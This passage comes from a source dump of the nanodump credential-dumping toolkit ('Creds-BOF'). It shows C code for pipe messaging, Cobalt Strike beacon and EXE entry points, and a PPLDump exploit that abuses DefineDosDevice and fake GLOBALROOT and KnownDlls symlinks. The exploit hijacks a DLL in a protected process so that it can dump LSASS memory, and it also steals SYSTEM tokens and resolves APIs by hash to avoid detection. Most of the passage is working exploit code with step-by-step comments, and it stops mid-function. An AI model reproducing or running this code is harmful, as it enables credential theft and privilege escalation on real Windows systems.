    if (!success || dwBytesRead == 0)
    {
        function_failed("ReadFile");
        goto cleanup;
    }

    if (data_size)
        *data_size = dwBytesRead;

    ret_val = TRUE;

cleanup:
    if (!ret_val && *data_bytes)
    {
        intFree(*data_bytes);
        *data_bytes = NULL;
    }

    return ret_val;
}

BOOL server_recv_arguments_from_pipe(
    IN HANDLE hPipe,
    OUT LPSTR* dump_path,
    OUT PBOOL use_valid_sig,
    OUT PBOOL elevate_handle)
{
    BOOL     ret_val     = FALSE;
    BOOL     success     = FALSE;
    PIPC_MSG req         = NULL;

    req = intAlloc(PAGE_SIZE);
    if (!req)
    {
        malloc_failed();
        goto cleanup;
    }

    success = read_data_from_pipe(
        hPipe,
        (PVOID)&req,
        NULL);
    if (!success)
        goto cleanup;

    if (req->Type != msg_type_parameters)
    {
        DPRINT_ERR("Invalid message type");
        goto cleanup;
    }

    if (dump_path)
    {
        *dump_path = intAlloc(MAX_PATH + 1);
        if (!*dump_path)
        {
            malloc_failed();
            goto cleanup;
        }

        memcpy(*dump_path, req->p.Params.dump_path, MAX_PATH + 1);
    }
    if (use_valid_sig)
        *use_valid_sig = req->p.Params.use_valid_sig;
    if (elevate_handle)
        *elevate_handle = req->p.Params.elevate_handle;

    ret_val = TRUE;

cleanup:
    if (req)
        intFree(req);

    return ret_val;
}

BOOL write_data_to_pipe(
    IN HANDLE hPipe,
    IN PVOID data_bytes,
    IN DWORD data_size)
{
    BOOL     ret_val        = FALSE;
    BOOL     success        = FALSE;
    DWORD    dwBytesWritten = 0;

    WriteFile_t WriteFile = NULL;

    WriteFile = (WriteFile_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        WriteFile_SW2_HASH,
        0);
    if (!WriteFile)
    {
        api_not_found("WriteFile");
        goto cleanup;
    }

    success = WriteFile(hPipe, data_bytes, data_size, &dwBytesWritten, NULL);
    if (!success && GetLastError() != ERROR_IO_PENDING)
    {
        function_failed("WriteFile");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL client_send_arguments_from_pipe(
    IN HANDLE hPipe,
    IN LPSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL elevate_handle)
{
    BOOL     ret_val        = FALSE;
    BOOL     success        = FALSE;
    PIPC_MSG ParamsMsg      = NULL;

    ParamsMsg = intAlloc(sizeof(IPC_MSG));
    if (!ParamsMsg)
    {
        malloc_failed();
        goto cleanup;
    }

    ParamsMsg->Type = msg_type_parameters;
    memcpy(ParamsMsg->p.Params.dump_path, dump_path, MAX_PATH + 1 );
    ParamsMsg->p.Params.use_valid_sig = use_valid_sig;
    ParamsMsg->p.Params.elevate_handle = elevate_handle;

    success = write_data_to_pipe(
        hPipe,
        ParamsMsg,
        sizeof(*ParamsMsg));
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (ParamsMsg)
        intFree(ParamsMsg);

    return ret_val;
}

BOOL server_disconnect_pipe(
    IN HANDLE hPipe)
{
    BOOL ret_val = FALSE;
    BOOL success = FALSE;

    if (!hPipe || hPipe == INVALID_HANDLE_VALUE)
        return TRUE;

    DisconnectNamedPipe_t DisconnectNamedPipe = NULL;

    DisconnectNamedPipe = (DisconnectNamedPipe_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNEL32_DLL, TRUE),
        DisconnectNamedPipe_SW2_HASH,
        0);
    if (!DisconnectNamedPipe)
    {
        api_not_found("DisconnectNamedPipe");
        goto cleanup;
    }

    success = DisconnectNamedPipe(hPipe);
    if (!success)
    {
        function_failed("DisconnectNamedPipe");
        goto cleanup;
    }

    ret_val = TRUE;

cleanup:
    return ret_val;
}

BOOL server_send_success(
    IN HANDLE hPipe,
    IN BOOL succeded)
{
    BOOL     ret_val        = FALSE;
    BOOL     success        = FALSE;
    PIPC_MSG ParamsMsg      = NULL;

    ParamsMsg = intAlloc(sizeof(IPC_MSG));
    if (!ParamsMsg)
    {
        malloc_failed();
        goto cleanup;
    }

    ParamsMsg->Type = msg_type_result;
    ParamsMsg->p.Result.succeded = succeded;

    success = write_data_to_pipe(
        hPipe,
        ParamsMsg,
        sizeof(*ParamsMsg));
    if (!success)
        goto cleanup;

    ret_val = TRUE;

cleanup:
    if (ParamsMsg)
        intFree(ParamsMsg);

    return ret_val;
}

BOOL client_recv_success(
    IN HANDLE hPipe,
    OUT PBOOL succeded)
{
    BOOL     ret_val = FALSE;
    BOOL     success = FALSE;
    PIPC_MSG req     = NULL;

    success = read_data_from_pipe(
        hPipe,
        (PVOID)&req,
        NULL);
    if (!success)
        goto cleanup;

    if (req->Type != msg_type_result)
    {
        DPRINT_ERR("Invalid message type");
        goto cleanup;
    }

    *succeded = req->p.Result.succeded;

    ret_val = TRUE;

cleanup:
    if (req)
        intFree(req);

    return ret_val;
}

#endif


================================================
FILE: Creds-BOF/nanodump/source/ppl/cleanup.c
================================================
#include "ppl/cleanup.h"

BOOL get_current_dll_filename(
    OUT LPCWSTR* ppwszDllName)
{
    // get the address of this code section
    PVOID IP = getIP();
    PND_PEB Peb = (PND_PEB)READ_MEMLOC(PEB_OFFSET);
    PND_PEB_LDR_DATA Ldr = Peb->Ldr;
    PVOID FirstEntry = &Ldr->InLoadOrderModuleList.Flink;
    PND_LDR_DATA_TABLE_ENTRY Entry = (PND_LDR_DATA_TABLE_ENTRY)Ldr->InLoadOrderModuleList.Flink;

    // loop over each loaded DLL
    for (; Entry != FirstEntry; Entry = (PND_LDR_DATA_TABLE_ENTRY)Entry->InLoadOrderLinks.Flink)
    {
        // check if this code section is inside of this DLL

        if ((ULONG_PTR)Entry->DllBase > (ULONG_PTR)IP)
            continue;

        if (RVA(ULONG_PTR, Entry->DllBase, Entry->SizeOfImage) <= (ULONG_PTR)IP)
            continue;

        // save the DLL name
        *ppwszDllName = Entry->BaseDllName.Buffer;
        return TRUE;
    }

    return FALSE;
}

BOOL delete_known_dll_entry(VOID)
{
    BOOL bReturnValue = FALSE;

    LPCWSTR pwszDllName = NULL;
    BOOL success;
    NTSTATUS status = 0;
    HANDLE hLink = NULL;
    LPWSTR pwszLinkPath = NULL;
    UNICODE_STRING name = { 0 };
    OBJECT_ATTRIBUTES oa = { 0 };

    SECURITY_DESCRIPTOR sd = { 0 };

    SetKernelObjectSecurity_t SetKernelObjectSecurity;
    SetKernelObjectSecurity = (SetKernelObjectSecurity_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        SetKernelObjectSecurity_SW2_HASH,
        0);
    if (!SetKernelObjectSecurity)
    {
        api_not_found("SetKernelObjectSecurity");
        goto end;
    }

    InitializeSecurityDescriptor_t InitializeSecurityDescriptor;
    InitializeSecurityDescriptor = (InitializeSecurityDescriptor_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        InitializeSecurityDescriptor_SW2_HASH,
        0);
    if (!InitializeSecurityDescriptor)
    {
        api_not_found("InitializeSecurityDescriptor");
        goto end;
    }
    SetSecurityDescriptorDacl_t SetSecurityDescriptorDacl;
    SetSecurityDescriptorDacl = (SetSecurityDescriptorDacl_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        SetSecurityDescriptorDacl_SW2_HASH,
        0);
    if (!SetSecurityDescriptorDacl)
    {
        api_not_found("SetSecurityDescriptorDacl");
        goto end;
    }

    success = get_current_dll_filename(&pwszDllName);
    if (!success)
        goto end;

    //
    // Build the path of the symbolic link object to delete. The name of the DLL can be determined
    // at runtime by invoking 'GetCurrentDllFileName'. The final path will be something such as 
    // '\KnownDlls\DPAPI.dll'.
    //
    pwszLinkPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszLinkPath)
    {
        malloc_failed();
        goto end;
    }

    wcsncpy(pwszLinkPath, L"\\KnownDlls\\", MAX_PATH);
    wcsncat(pwszLinkPath, pwszDllName, MAX_PATH);

    DPRINT("Object to delete: %ls", pwszLinkPath);

    name.Buffer  = pwszLinkPath;
    name.Length  = (USHORT)wcsnlen(name.Buffer, MAX_PATH);;
    name.Length *= 2;
    name.MaximumLength = name.Length + 2;
    InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE, NULL, NULL);

    //
    // Here we want to call NtOpenSymbolicLinkObject with DELETE access because we want to delete
    // the link. Unfortunately, the inherited ACL does not grant us this right and we will thus 
    // get an "Access denied" error. What we can do though is open the symbolic link object with
    // WRITE_DAC access in order to change the ACL of the object.
    //
    status = NtOpenSymbolicLinkObject(
        &hLink,
        WRITE_DAC,
        &oa);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenSymbolicLinkObject", status);
        goto end;
    }

    DPRINT("NtOpenSymbolicLinkObject('%ls', WRITE_DAC) OK", pwszLinkPath);

    //
    // Prepare the Security Descriptor. Here we will just use a NULL DACL. This will give everyone
    // access to the object but that's not really an issue because we'll delete it right after.
    //
    success = InitializeSecurityDescriptor(
        &sd,
        SECURITY_DESCRIPTOR_REVISION);
    if (!success)
    {
        function_failed("InitializeSecurityDescriptor");
        goto end;
    }

    success = SetSecurityDescriptorDacl(
        &sd,
        TRUE,
        NULL,
        FALSE);
    if (!success)
    {
        function_failed("SetSecurityDescriptorDacl");
        goto end;
    }

    //
    // Apply the new Security Descriptor.
    //
    success = SetKernelObjectSecurity(
        hLink,
        DACL_SECURITY_INFORMATION,
        &sd);
    if (!success)
    {
        function_failed("SetKernelObjectSecurity");
        goto end;
    }

    DPRINT("SetKernelObjectSecurity OK");

    //
    // At this point we can close the object handle because only the WRITE_DAC right is associated
    // to it. This handle will not allow us to delete the object.
    //
    status = NtClose(hLink); hLink = NULL;
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtClose", status);
        goto end;
    }

    DPRINT("NtClose OK");

    //
    // This time, we should be able to open the link object with DELETE access.
    //
    status = NtOpenSymbolicLinkObject(
        &hLink,
        DELETE,
        &oa);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtOpenSymbolicLinkObject", status);
        goto end;
    }

    DPRINT("NtOpenSymbolicLinkObject('%ls', DELETE) OK", pwszLinkPath);

    //
    // Now, we can invoke NtMakeTemporaryObject to disable the "Permanent" flag of the object. When
    // an object does not have the "Permanent" flag enabled, it is automatically deleted when all 
    // its handles are closed.
    //
    status = NtMakeTemporaryObject(hLink);
    if (!NT_SUCCESS(status))
    {
        syscall_failed("NtMakeTemporaryObject", status);
        goto end;
    }

    DPRINT("NtMakeTemporaryObject OK");

    bReturnValue = TRUE;

end:
    if (hLink)
        NtClose(hLink);
    if (pwszLinkPath)
    {
        DATA_FREE(pwszLinkPath, wcslen(pwszLinkPath) * sizeof(WCHAR));
    }

    return bReturnValue;
}


================================================
FILE: Creds-BOF/nanodump/source/ppl/ppl.c
================================================
#include "ppl/ppl.h"

#if defined(PPL_DUMP) && defined(BOF)

#include "ppl_dump.c"
#include "ppl_utils.c"
#include "../utils.c"
#include "../dinvoke.c"
#include "../syscalls.c"
#include "../token_priv.c"
#include "../impersonate.c"

void go(char* args, int length)
{
    datap          parser                    = { 0 };
    BOOL           duplicate_handle          = FALSE;
    LPCSTR         dump_path                 = NULL;
    BOOL           use_valid_sig             = FALSE;
    unsigned char* nanodump_ppl_dump_dll     = NULL;
    int            nanodump_ppl_dump_dll_len = 0;

    BeaconDataParse(&parser, args, length);
    dump_path = BeaconDataExtract(&parser, NULL);
    use_valid_sig = (BOOL)BeaconDataInt(&parser);
    duplicate_handle = (BOOL)BeaconDataInt(&parser);
    nanodump_ppl_dump_dll = (unsigned char*)BeaconDataExtract(&parser, &nanodump_ppl_dump_dll_len);

    run_ppl_dump_exploit(
        nanodump_ppl_dump_dll,
        nanodump_ppl_dump_dll_len,
        dump_path,
        use_valid_sig,
        duplicate_handle);
}

#elif defined(PPL_DUMP) && defined(EXE)

#include "ppl/ppl_dump.h"

#ifdef _WIN64
 #include "nanodump_ppl_dump_dll.x64.h"
#else
 #include "nanodump_ppl_dump_dll.x86.h"
#endif

void usage(char* procname)
{
    PRINT("usage: %s --write C:\\Windows\\Temp\\doc.docx [--valid] [--duplicate] [--help]", procname);
    PRINT("Dumpfile options:");
    PRINT("    --write DUMP_PATH, -w DUMP_PATH");
    PRINT("            filename of the dump");
    PRINT("    --valid, -v");
    PRINT("            create a dump with a valid signature");
    PRINT("Obtain an LSASS handle via:");
    PRINT("    --duplicate, -d");
    PRINT("            duplicate an existing " LSASS " handle");
    PRINT("Help:");
    PRINT("    --help, -h");
    PRINT("            print this help message and leave");
}

int main(int argc, char* argv[])
{
    BOOL   duplicate_handle = FALSE;
    LPCSTR dump_path        = NULL;
    BOOL   use_valid_sig    = FALSE;

#ifdef _M_IX86
    if(local_is_wow64())
    {
        PRINT_ERR("Nanodump does not support WoW64");
        return -1;
    }
#endif

    for (int i = 1; i < argc; ++i)
    {
        if (!strncmp(argv[i], "-v", 3) ||
            !strncmp(argv[i], "--valid", 8))
        {
            use_valid_sig = TRUE;
        }
        else if (!strncmp(argv[i], "-w", 3) ||
                 !strncmp(argv[i], "--write", 8))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write value");
                return 0;
            }
            dump_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-d", 3) ||
                 !strncmp(argv[i], "--duplicate", 12))
        {
            duplicate_handle = TRUE;
        }
        else if (!strncmp(argv[i], "-h", 3) ||
                 !strncmp(argv[i], "--help", 7))
        {
            usage(argv[0]);
            return 0;
        }
        else
        {
            PRINT("invalid argument: %s", argv[i]);
            return 0;
        }
    }

    if (!dump_path)
    {
        PRINT("You need to provide the --write parameter");
        return 0;
    }

    if (!is_full_path(dump_path))
    {
        PRINT("You need to provide the full path: %s", dump_path);
        return 0;
    }

    run_ppl_dump_exploit(
        nanodump_ppl_dump_dll,
        nanodump_ppl_dump_dll_len,
        dump_path,
        use_valid_sig,
        duplicate_handle);

    return 0;
}

#elif defined(PPL_MEDIC) && defined(BOF)

#include "ppl_medic.c"
#include "ppl_medic_client.c"
#include "ppl_utils.c"
#include "../handle.c"
#include "../utils.c"
#include "../dinvoke.c"
#include "../syscalls.c"
#include "../token_priv.c"
#include "../impersonate.c"
#if PASS_PARAMS_VIA_NAMED_PIPES == 1
#include "../pipe.c"
#endif

void go(char* args, int length)
{
    datap          parser                     = { 0 };
    unsigned char* nanodump_ppl_medic_dll     = NULL;
    int            nanodump_ppl_medic_dll_len = 0;
    LPSTR          dump_path                  = NULL;
    BOOL           use_valid_sig              = FALSE;
    BOOL           elevate_handle             = FALSE;

    BeaconDataParse(&parser, args, length);
    nanodump_ppl_medic_dll = (unsigned char*)BeaconDataExtract(&parser, &nanodump_ppl_medic_dll_len);

#if PASS_PARAMS_VIA_NAMED_PIPES == 1
    /*
     * only parse parameters if PASS_PARAMS_VIA_NAMED_PIPES is enabled
     * if not, the hardcoded options in NanoDumpPPLMedic will be used
     */
    dump_path = BeaconDataExtract(&parser, NULL);
    use_valid_sig = (BOOL)BeaconDataInt(&parser);
    elevate_handle = (BOOL)BeaconDataInt(&parser);
#endif

    run_ppl_medic_exploit(
        nanodump_ppl_medic_dll,
        nanodump_ppl_medic_dll_len,
        dump_path,
        use_valid_sig,
        elevate_handle);
}

#elif defined(PPL_MEDIC) && defined(EXE)

#include "ppl/ppl_medic.h"

#include "nanodump_ppl_medic_dll.x64.h"

#if !defined(PASS_PARAMS_VIA_NAMED_PIPES) || (PASS_PARAMS_VIA_NAMED_PIPES == 0)

int main(int argc, char* argv[])
{
    if (argc > 1)
    {
        PRINT("This binary doesn't take any parameteres because all the 'dump options' are hardcoded in NanoDumpPPLMedic");
        return 0;
    }

    run_ppl_medic_exploit(
        nanodump_ppl_medic_dll,
        nanodump_ppl_medic_dll_len,
        NULL,
        FALSE,
        FALSE);

    return 0;
}

#else

void usage(char* procname)
{
    PRINT("usage: %s --write C:\\Windows\\Temp\\doc.docx [--valid] [--elevate-handle] [--help]", procname);
    PRINT("Dumpfile options:");
    PRINT("    --write DUMP_PATH, -w DUMP_PATH");
    PRINT("            filename of the dump");
    PRINT("    --valid, -v");
    PRINT("            create a dump with a valid signature");
    PRINT("Avoid opening a handle with high privileges:")
    PRINT("    --elevate-handle, -eh");
    PRINT("            open a handle to " LSASS " with low privileges and duplicate it to gain higher privileges");
    PRINT("Help:");
    PRINT("    --help, -h");
    PRINT("            print this help message and leave");
}

int main(int argc, char* argv[])
{
    LPSTR  dump_path         = NULL;
    BOOL   use_valid_sig     = FALSE;
    BOOL   elevate_handle    = FALSE;

    for (int i = 1; i < argc; ++i)
    {
        if (!strncmp(argv[i], "-v", 3) ||
            !strncmp(argv[i], "--valid", 8))
        {
            use_valid_sig = TRUE;
        }
        else if (!strncmp(argv[i], "-w", 3) ||
                 !strncmp(argv[i], "--write", 8))
        {
            if (i + 1 >= argc)
            {
                PRINT("missing --write value");
                return 0;
            }
            dump_path = argv[++i];
        }
        else if (!strncmp(argv[i], "-eh", 4) ||
                 !strncmp(argv[i], "--elevate-handle", 17))
        {
            elevate_handle = TRUE;
        }
        else if (!strncmp(argv[i], "-h", 3) ||
                 !strncmp(argv[i], "--help", 7))
        {
            usage(argv[0]);
            return 0;
        }
        else
        {
            PRINT("invalid argument: %s", argv[i]);
            return 0;
        }
    }

    if (!dump_path)
    {
        PRINT("You need to provide the --write parameter");
        return 0;
    }

    if (!is_full_path(dump_path))
    {
        PRINT("You need to provide the full path: %s", dump_path);
        return 0;
    }

    run_ppl_medic_exploit(
        nanodump_ppl_medic_dll,
        nanodump_ppl_medic_dll_len,
        dump_path,
        use_valid_sig,
        elevate_handle);

    return 0;
}

#endif

#endif


================================================
FILE: Creds-BOF/nanodump/source/ppl/ppl_dump.c
================================================
#include "ppl/ppl_dump.h"

BOOL run_ppl_dump_exploit(
    IN unsigned char nanodump_ppl_dump_dll[],
    IN unsigned int nanodump_ppl_dump_dll_len,
    IN LPCSTR dump_path,
    IN BOOL use_valid_sig,
    IN BOOL duplicate_handle)
{
    BOOL bCurrentUserIsSystem = FALSE;
    HANDLE hSystemToken = NULL;
    BOOL bImpersonationActive = FALSE;
    BOOL success;
    NTSTATUS status;
    BOOL bReturnValue = FALSE;

    // STEP 1
    LPWSTR pwszKnownDllsObjDir = L"\\GLOBAL??\\KnownDlls";
    HANDLE hKnownDllsObjDir = NULL;

    // STEP 2
    LPWSTR pwszDllToHijack = NULL;
    LPWSTR pwszDllLinkName = NULL;
    HANDLE hDllLink = NULL;
    SECURITY_DESCRIPTOR sd = { 0 };

    // STEP 3
    LPWSTR pwszFakeGlobalrootLinkName = L"\\??\\GLOBALROOT";
    LPWSTR pwszFakeGlobalrootLinkTarget = L"\\GLOBAL??";
    HANDLE hFakeGlobalrootLink = NULL;
    HANDLE hLocalServiceToken = NULL;

    // STEP 4
    LPWSTR pwszDosDeviceName = NULL;
    LPWSTR pwszDosDeviceTargetPath = NULL;

    // STEP 5
    LPWSTR pwszSectionName = NULL;
    HANDLE hDllSection = NULL;
    HANDLE hTransaction = NULL;

    // STEP 6
    LPWSTR pwszCommandLine = NULL;
    HANDLE hCurrentToken = NULL;
    HANDLE hNewProcessToken = NULL;
    HANDLE hNewProcess = NULL;
    SECURITY_QUALITY_OF_SERVICE Qos = { 0 };
    OBJECT_ATTRIBUTES TokenObjectAttributes = { 0 };
    RevertToSelf_t RevertToSelf = NULL;

    if (!check_ppl_requirements())
        goto end;

    RevertToSelf = (RevertToSelf_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        RevertToSelf_SW2_HASH,
        0);
    if (!RevertToSelf)
    {
        api_not_found("RevertToSelf");
        goto end;
    }

    InitializeSecurityDescriptor_t InitializeSecurityDescriptor;
    InitializeSecurityDescriptor = (InitializeSecurityDescriptor_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        InitializeSecurityDescriptor_SW2_HASH,
        0);
    if (!InitializeSecurityDescriptor)
    {
        api_not_found("InitializeSecurityDescriptor");
        goto end;
    }

    SetSecurityDescriptorDacl_t SetSecurityDescriptorDacl;
    SetSecurityDescriptorDacl = (SetSecurityDescriptorDacl_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        SetSecurityDescriptorDacl_SW2_HASH,
        0);
    if (!SetSecurityDescriptorDacl)
    {
        api_not_found("SetSecurityDescriptorDacl");
        goto end;
    }

    DefineDosDeviceW_t DefineDosDeviceW;
    DefineDosDeviceW = (DefineDosDeviceW_t)(ULONG_PTR)get_function_address(
        get_library_address(KERNELBASE_DLL, TRUE),
        DefineDosDeviceW_SW2_HASH,
        0);
    if (!DefineDosDeviceW)
    {
        api_not_found("DefineDosDeviceW");
        goto end;
    }

    SetKernelObjectSecurity_t SetKernelObjectSecurity;
    SetKernelObjectSecurity = (SetKernelObjectSecurity_t)(ULONG_PTR)get_function_address(
        get_library_address(ADVAPI32_DLL, TRUE),
        SetKernelObjectSecurity_SW2_HASH,
        0);
    if (!SetKernelObjectSecurity)
    {
        api_not_found("SetKernelObjectSecurity");
        goto end;
    }

    if (file_exists(dump_path))
    {
        if (!delete_file(dump_path))
        {
            goto end;
        }
    }

    DPRINT("Get the name of the DLL to hijack");

    success = get_hijackeable_dllname(&pwszDllToHijack);
    if (!success)
        goto end;

    DPRINT("DLL to hijack: %ls", pwszDllToHijack);

    success = is_current_user_system(&bCurrentUserIsSystem);
    if (!success)
        goto end;

    DPRINT("Current user is SYSTEM? -> %x", bCurrentUserIsSystem);

    //
    // 1. Create the object directory '\GLOBAL??\KnownDlls'.
    //
    //    When executed as an administrator, this fails (access denied). Thanks to WinObj, we can 
    //    see that Administrators do have the "Add Object" right but the corresponding ACE applies 
    //    to child objects only, which means that they cannot add objects in the directory 
    //    '\Global??' itself. Therefore, we need to elevate to SYSTEM first. To do so we will 
    //    search for SYSTEM tokens among the running processes and steal one. This requires both
    //    SeImpersonatePrivilege and SeDebugPrivilege.
    //    Note: as long as the object is not marked as "permanent", we do not need to remove it 
    //    manually. When we close the last handle, the object is removed automatically.
    //
    if (!bCurrentUserIsSystem)
    {
        success = impersonate_system(&hSystemToken);
        if (!success)
        {
            DPRINT_ERR("Failed to impersonate SYSTEM");
            goto end;
        }

        bImpersonationActive = TRUE;

        DPRINT("Impersonating SYSTEM...");
    }

    success = object_manager_create_directory(
        pwszKnownDllsObjDir,
        &hKnownDllsObjDir);
    if (!success)
        goto end;

    DPRINT("Created Object Directory: '%ls'", pwszKnownDllsObjDir);

    //
    // 2. Create a symlink in '\GLOBAL??\KnownDlls\' with the name of a DLL to hijack. The target
    //    of the link doesn't matter.
    //
    //    The next steps will allow us to trick the CSRSS service into opening the symbolic link
    //    '\GLOBAL??\KnownDlls\FOO.dll' instead of '\KnownDlls\FOO.dll' while impersonating the
    //    caller. That's why we need to create this symbolic link beforehand. As the service will 
    //    just open the object itself, its target does not matter. 
    //

    pwszDllLinkName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszDllLinkName)
    {
        malloc_failed();
        goto end;
    }

    wcsncpy(pwszDllLinkName, pwszKnownDllsObjDir, MAX_PATH);
    wcsncat(pwszDllLinkName, L"\\", MAX_PATH);
    wcsncat(pwszDllLinkName, pwszDllToHijack, MAX_PATH);

    success = object_manager_create_symlik(
        pwszDllLinkName,
        DLL_LINK_TARGET,
        &hDllLink);
    if (!success || !hDllLink)
        goto end;

    DPRINT("Created Symbolic link: '%ls'", pwszDllLinkName);

    //
    // 3. Inside the user's DOS device directory create a new symbolic link called 'GLOBALROOT' 
    //    pointing to '\GLOBAL??'
    //
    //    The idea here is to create a "fake" GLOBALROOT that will point to a location we control
    //    because, at step 4, the CSRSS service will try to open '\??\GLOBALROOT\...' while
    //    impersonating the caller. '\??' represents the current user's DOS device directory. For 
    //    SYSTEM, '\??' points to '\GLOBAL??' so '\??\GLOBALROOT' is '\GLOBAL??\GLOBALROOT', which 
    //    is the actual GLOBALROOT. Therefore the trick would not work.
    //    However, for users other than SYSTEM, '\??' points to a dedicated DOS device directory
    //    such as '\Sessions\0\DosDevices\00000000-XXXXXXXX'. Therefore, we can create a fake 
    //    GLOBALROOT symbolic link that points to an arbitrary location. If we create this link so
    //    that '\Sessions\0\DosDevices\00000000-XXXXXXXX\GLOBALROOT' -> '\GLOBAL??', 
    //    '\??\GLOBALROOT' will actually point to '\GLOBAL??' instead of '\GLOBAL??\GLOBALROOT' in
    //    our context.
    //    To summarize:
    //      - If SYSTEM: '\??\GLOBALROOT' -> '' 
    //      - Else:      '\??\GLOBALROOT' -> '\GLOBAL??' (because of our symbolic link)
    //    Which means that:
    //      - If SYSTEM: '\??\GLOBALROOT\KnownDlls\FOO.DLL' -> '\KnownDlls\FOO.DLL'
    //      - Else:      '\??\GLOBALROOT\KnownDlls\FOO.DLL' -> '\GLOBAL??\KnownDlls\FOO.DLL'
    //
    //    So, at this step, we need to:
    //      - revert to self if we impersonated SYSTEM as an administrator;
    //      - impersonate another user (LOCAL SERVICE for example) if we were running as SYSTEM.
    //

    if (bCurrentUserIsSystem)
    {
        //
        // If we are running as SYSTEM, we need to impersonate another user. But, if we do so, the
        // the impersonated user will not have sufficient access on the symbolic link we just 
        // created and the DefineDosDevice call will fail with an "Access Denied" error. Therefore
        // we need to edit the ACL of the object first.
        // 
        success = InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION);
        if (!success)
        {
            function_failed("InitializeSecurityDescriptor");
            goto end;
        }

        success = SetSecurityDescriptorDacl(&sd, TRUE, NULL, FALSE);
        if (!success)
        {
            function_failed("SetSecurityDescriptorDacl");
            goto end;
        }

        DPRINT("Set a NULL DACL on '%ls'", pwszDllLinkName);

        success = SetKernelObjectSecurity(
            hDllLink,
            DACL_SECURITY_INFORMATION,
            &sd);
        if (!success)
        {
            function_failed("SetKernelObjectSecurity");
            goto end;
        }

        success = impersonate_local_service(&hLocalServiceToken);
        if (!success)
            goto end;

        bImpersonationActive = TRUE;

        DPRINT("Impersonating LOCAL SERVICE...");
    }
    else
    {
        success = RevertToSelf();
        if (!success)
        {
            function_failed("RevertToSelf");
            goto end;
        }

        bImpersonationActive = FALSE;
    }

    success = object_manager_create_symlik(
        pwszFakeGlobalrootLinkName,
        pwszFakeGlobalrootLinkTarget,
        &hFakeGlobalrootLink);
    if (!success)
        goto end;

    DPRINT("Created symbolic link: '%ls -> %ls'", pwszFakeGlobalrootLinkName, pwszFakeGlobalrootLinkTarget);

    //
    // 4. Call DefineDosDevice specifying a device name of "GLOBALROOT\KnownDlls\FOO.DLL" and a target
    //    path of a location that the user can create section objects inside.
    //
    //    This still need to be executed as a user other than SYSTEM, so that all the symbolic links 
    //    are properly followed. This is the "fun" part. DefineDosDevice actually results in an RPC 
    //    call to the CSRSS service. On server side, here is how the device name will be interpreted:
    //      a. it receives the device name as the second argument;
    //             >>> GLOBALROOT\KnownDlls\FOO.DLL
    //      b. it will first prepend it with '\??\';
    //             >>> \??\GLOBALROOT\KnownDlls\FOO.DLL
    //      c. it will try to open the symbolic link while impersonating the client, the call succeeds
    //         because we control this symlink (step 1)
    //             >>> \GLOBAL??\KnownDlls\FOO.DLL (\??\GLOBALROOT -> \GLOBAL??)
    //      d. it checks whether the path starts with \GLOBAL??\ to determine if it's global;
    //      e. as it does, it rewrites the path and prepends it with '\GLOBAL??\', considers the link
    //         as global and disables impersonation;
    //             >>> \GLOBAL??\GLOBALROOT\KnownDlls\FOO.DLL
    //      f. but \GLOBAL??\GLOBALROOT, which is the real GLOBALROOT
    //             >>> \KnownDlls\FOO.DLL
    //      g. if invokes NtCreateSymbolicLinkObject without impersonating the user and therefore 
    //         creates a symlink inside '\KnownDlls\' with an arbitrary name and an arbitrary target
    //         path.
    //
    //    /!\  The purpose of the initial open operation is to delete the symlink and this is always
    //         done while impersonating the user. Therefore we won't be able to delete the symlink
    //         that was created in \KnownDlls\. We will have to remove it once we are running code 
    //         inside a PPL with WinTCB level.
    //
    pwszDosDeviceName = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszDosDeviceName)
    {
        malloc_failed();
        goto end;
    }

    pwszDosDeviceTargetPath = intAlloc((MAX_PATH + 1) * sizeof(WCHAR));
    if (!pwszDosDeviceTargetPath)
    {
        malloc_failed();
        goto end;
    }

    wcsncpy(pwszDosDeviceName, L"GLOBALROOT\\KnownDlls\\", MAX_PATH);
    wcsncat(pwszDosDeviceName, pwszDllToHijack, MAX_PATH);
    wcsncpy(pwszDosDeviceTargetPath, L"\\KernelObjects\\", MAX_PATH);
    wcsncat(pwszDosDeviceTargetPath, pwszDllToHijack, MAX_PATH);

    DPRINT("Call DefineDosDevice to create '\\KnownDlls\\%ls' -> '%ls'", pwszDllToHijack, pwszDosDeviceTargetPath);

    success = DefineDosDeviceW(
        DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH,
        pwszDosDeviceName,
        pwszDosDeviceTargetPath);
    if (!success && GetLastError() != ERROR_ALREADY_EXISTS)
    {
        PRINT_ERR("Call to 'DefineDosDeviceW' failed, error: %ld", GetLastError());
        goto end;
    }

    DPRINT("DefineDosDevice OK");

    //
    // Make sure the link was really created as a consequence of the DefineDosDevice call. But 
    // first, let's revert to self if we are running as SYSTEM or impersonate SYSTEM again.
    //
    if (bCurrentUserIsSystem)
    {
        success = RevertToSelf();
        if (!success)
        {
            function_failed("RevertToSelf");
            goto end;
        }

        bImpersonationActive = FALSE;
    }
    else
    {
        success = impersonate(hSystemToken);
        if (!success)
            goto end;

        bImpersonationActive = TRUE;

        DPRINT("Impersonating SYSTEM...");
    }

    DPRINT("Check whether the symbolic link was really created in '\\KnownDlls\\'");

    success = check_known_dll_symbolic_link(
        pwszDllToHijack,
        pwszDosDeviceTargetPath);
    if (!success)
    {
